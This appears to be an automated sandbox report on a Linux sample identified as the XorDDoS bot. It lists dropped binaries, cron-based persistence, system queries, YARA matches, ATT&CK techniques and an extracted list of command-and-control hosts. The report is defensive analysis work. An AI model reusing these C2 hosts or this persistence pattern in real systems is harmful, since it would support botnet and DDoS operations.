Source: /usr/bin/snvjsgswbz (PID: 6638)	File: /usr/bin/snvjsgswbz	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6639)	File: /usr/bin/snvjsgswbz	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6640)	File: /usr/bin/snvjsgswbz	Jump to behavior

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	Path: /etc/cron.hourly/gcc.sh			Jump to dropped file
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	Path: /run/gcc.pid			Jump to dropped file

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /tmp/TmoTjBkSXT.elf (PID: 6220)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/TmoTjBkSXT.elf (PID: 6221)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6254)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6257)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6259)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6262)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wrvgghkqdd (PID: 6265)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6272)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6275)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6277)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6280)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqnheeruxi (PID: 6283)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6289)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6292)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6294)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6297)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfjhcudkoa (PID: 6300)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6326)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6329)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6331)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6334)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/eygutfitxp (PID: 6337)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6343)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6346)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6349)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6351)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ljhaidbadz (PID: 6354)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6360)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6365)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6367)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6370)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ogbruyreel (PID: 6373)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6379)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6382)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6384)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6387)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xilfqxoepi (PID: 6390)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6396)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6399)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6402)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6404)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ucawyxmhdv (PID: 6407)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6413)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6416)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6419)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6421)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/flfoijfhrh (PID: 6424)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6433)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6436)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6438)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6441)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zuuufkngmy (PID: 6444)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6450)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6453)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6456)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6458)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmvkvnihjm (PID: 6460)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6467)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6470)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6472)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6475)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vwtoogupfm (PID: 6478)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6484)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6487)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6489)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6492)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/zygafieftp (PID: 6494)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6501)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6504)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6507)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6509)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ybavzvdbws (PID: 6512)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6519)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6522)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6524)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6527)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/piqqogcjxo (PID: 6529)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6538)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6541)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6544)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6546)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/mqwsbvfumc (PID: 6549)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6555)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6558)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6560)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6563)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uonpajpwtj (PID: 6566)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6573)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6575)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6577)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6580)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qmlitbamhb (PID: 6582)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6590)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6592)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6594)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6597)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uoqnuhuwzn (PID: 6600)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6607)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6609)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6611)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6614)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/pmctuvfdvh (PID: 6616)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6627)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6629)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6631)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6634)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snvjsgswbz (PID: 6637)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/abhfppzmcz (PID: 6644)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/abhfppzmcz (PID: 6646)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/abhfppzmcz (PID: 6648)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/abhfppzmcz (PID: 6651)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/abhfppzmcz (PID: 6654)	Queries kernel information via 'uname':	Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: TmoTjBkSXT.elf, type: SAMPLE
Source: Yara match	File source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6403.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6348.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6477.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6526.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6559.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6281.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6378.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6293.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6223.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6325.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6386.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6381.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6420.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6537.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6412.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6330.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6528.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6518.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6276.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6511.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6455.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6521.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6486.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6258.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6220, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6222, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6223, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6253, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6258, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6261, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6271, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6274, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6279, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6281, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6293, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6299, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6325, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6330, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6333, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6336, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6342, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6345, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6350, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6353, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6359, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6366, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6378, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6381, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6383, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6386, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6389, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6395, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6398, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6401, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6403, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6406, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6415, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6422, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6437, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6443, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6449, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6455, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6459, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6466, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6469, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6471, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6474, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6477, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6483, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6486, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TmoTjBkSXT.elf PID: 6500, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/ucawyxmhdv, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/mqnheeruxi, type: DROPPED
Source: Yara match	File source: /usr/bin/zygafieftp, type: DROPPED
Source: Yara match	File source: /usr/bin/rfjhcudkoa, type: DROPPED
Source: Yara match	File source: /usr/bin/flfoijfhrh, type: DROPPED
Source: Yara match	File source: /usr/bin/ybavzvdbws, type: DROPPED
Source: Yara match	File source: /usr/bin/eygutfitxp, type: DROPPED
Source: Yara match	File source: /usr/bin/ljhaidbadz, type: DROPPED
Source: Yara match	File source: /usr/bin/ogbruyreel, type: DROPPED
Source: Yara match	File source: /usr/bin/xilfqxoepi, type: DROPPED
Source: Yara match	File source: /usr/bin/zuuufkngmy, type: DROPPED
Source: Yara match	File source: /usr/bin/vwtoogupfm, type: DROPPED
Source: Yara match	File source: /usr/bin/wrvgghkqdd, type: DROPPED
Source: Yara match	File source: /usr/bin/pmvkvnihjm, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 File Deletion	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

Threatname: XorDDoS

{"C2 list": ["http://ww.wowapplecar.com/config.rar\u000030", "dd.vvbb321.com:1430", "dd.jjkk567.com:1430", "dd.nnmm234.com:1430"]}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

